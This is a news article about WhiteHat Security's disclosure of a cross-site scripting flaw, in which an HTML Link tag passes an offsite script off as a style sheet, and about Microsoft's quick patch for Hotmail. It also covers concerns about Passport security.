New Hack Poses Threat to Popular Web Services
UPDATED Cross Site Scripting (CSS), a relatively new method of attack, has once again proven itself to be a formidable opponent in the quest to secure the Web. The attack involves a method where by an unauthorized script is passed to a Web server for execution – even if the server is secured against running such scripts. Simply by visiting a Web site or by reading an HTML formatted e-mail, users can potentially become the unwitting victims of malicious hackers.
Leading providers of Internet services such as Microsoft have long advised customers to "Avoid promiscuous Web browsing." However, some of the most mainstream sites. including Microsoft's own Hotmail service, were at risk to a vulnerability discovered by experts at WhiteHat Security.
Although Hotmail was affected, the attack is not vendor specific. The full scope of the findings also include all HTML-aware web applications.
Upon discovering the exploit, a handful of leading companies were immediately notified, provided with technical details, and have subsequently addressed the concerns initially raised by WhiteHat's Jeremiah Grossman.
Popular online services such as auctions, message boards, HTML chats, and guestbooks are among those at risk.
Earlier this week, a Japanese auction site called Price Loto experienced a similar attack resulting in considerable damages and a substantial interruption in its services.
By simply placing an HTML "Link" tag in an e-mail or Web application, JavaScript can be executed on behalf of the hosting domain, providing the same trust relationship set aside for legitimate code. According to WhiteHat, the Link tag masquerades an offsite script as a Style sheet. This particular attack represents a new form of CSS attack never before publicly disclosed.
With a few short lines of HTML, security is bypassed allowing the script to execute or modify files, propagate email viruses, or even steal a cookie -- a file that store sensitive information -- from Web sites. JavaScript includes a number of robust functions and is often filtered out for security purposes.
Given these conditions, it is also possible to flood a particular site address, such as the White House or even Microsoft's own homepage, with overwhelming traffic, effectively launching a denial of service attack. The Code-Red worm followed a similar concept and sought to bring down whitehouse.gov, disrupting Internet traffic and enjoying unprecedented press coverage in the process.
WhiteHat's Tim Orden issued the following statement to BetaNews: "WhiteHat Security is dedicated to assisting in the effort, to secure the Internet as a reliable, safe way to exchange ideas, disseminate information and propagate commerce.
We release information on web application security in order to tighten up, what continues to be a relatively lax concern for the public's right to a secure Internet. It is our hope that by publicly releasing information describing web application vulnerabilities, we can remind these public utilities to focus on responsible, secure services for the masses.
"We urge those companies that are truly concerned about offering a secure service to the public, to contact us immediately. Many web applications remain insecure and unfit for the public trust. Utilizing our depth of knowledge and due diligence can go a long way towards maximizing the security of any web application."
Companies Scramble to Squash Bugs
Although Microsoft and other affected organizations were not immediately available for comment, Microsoft Spokesperson Jim Desler has since issued a statement.
Desler told BetaNews, "A cross-site scripting vulnerability in Hotmail was brought to our attention late Tuesday afternoon by WhiteHat. Microsoft worked immediately to address the issue and implemented a fix on all Hotmail servers in less than 12 hours of being notified by WhiteHat. To our knowledge, no Hotmail users have been affected and customer information is not in jeopardy."
He continued on, "While Hotmail was the only internet email service identified by WhiteHat, our evidence and WhiteHat's advisory indicate that this issue affects many HTML aware web applications industry wide. As seen with this recently reported incident, when Microsoft find issues like this, we move quickly and decisively address them as part of our ongoing effort to protect customers."
Hotmail is among the many services that were patched prior to publication which are no longer vulnerable to the attack.
An Uncertain Future
Consumer products such as the newly released Windows XP continue the push toward merging traditional desktop software with online services. Microsoft is actively promoting its highly touted .NET architecture to developers, and promises to deliver a plethora of web-based applications that will handle common computing tasks. Rivals such as Sun Microsystems are also following suit with technologies such as Sun's Jini - an alternative whose development precedes .NET.
To provide a seamless experience between different web-based services, Microsoft has endorsed its own Passport authentication system as a universal solution for sign in. Customers will interact with server side applications running on shared web servers, trusting personal as well as financial information to remote systems. Passport, will be bolstered by VeriSign technology in cases were additional security measures are required.
However, security experts still have their sights aimed at Passport, placing it under heavy fire. eWEEK reports that a flaw in the technology can place personal information in the hands of malicious individuals who simply have to obtain a cookie from a target system, thereby easily gaining access.
As first reported by BetaNews, AOL is also in the process of phasing in its own authentication system dubbed Magic Carpet. The use of Web-based services is set to become more commonplace as companies roll out their answers to .NET enabled applications.
The full security bulletin, which includes several solutions to mitigate a reoccurrence of the exploit, can be found at the WhiteHat Web site. Although there has been full public disclosure, the number of web applications that remain at risk cannot be determined.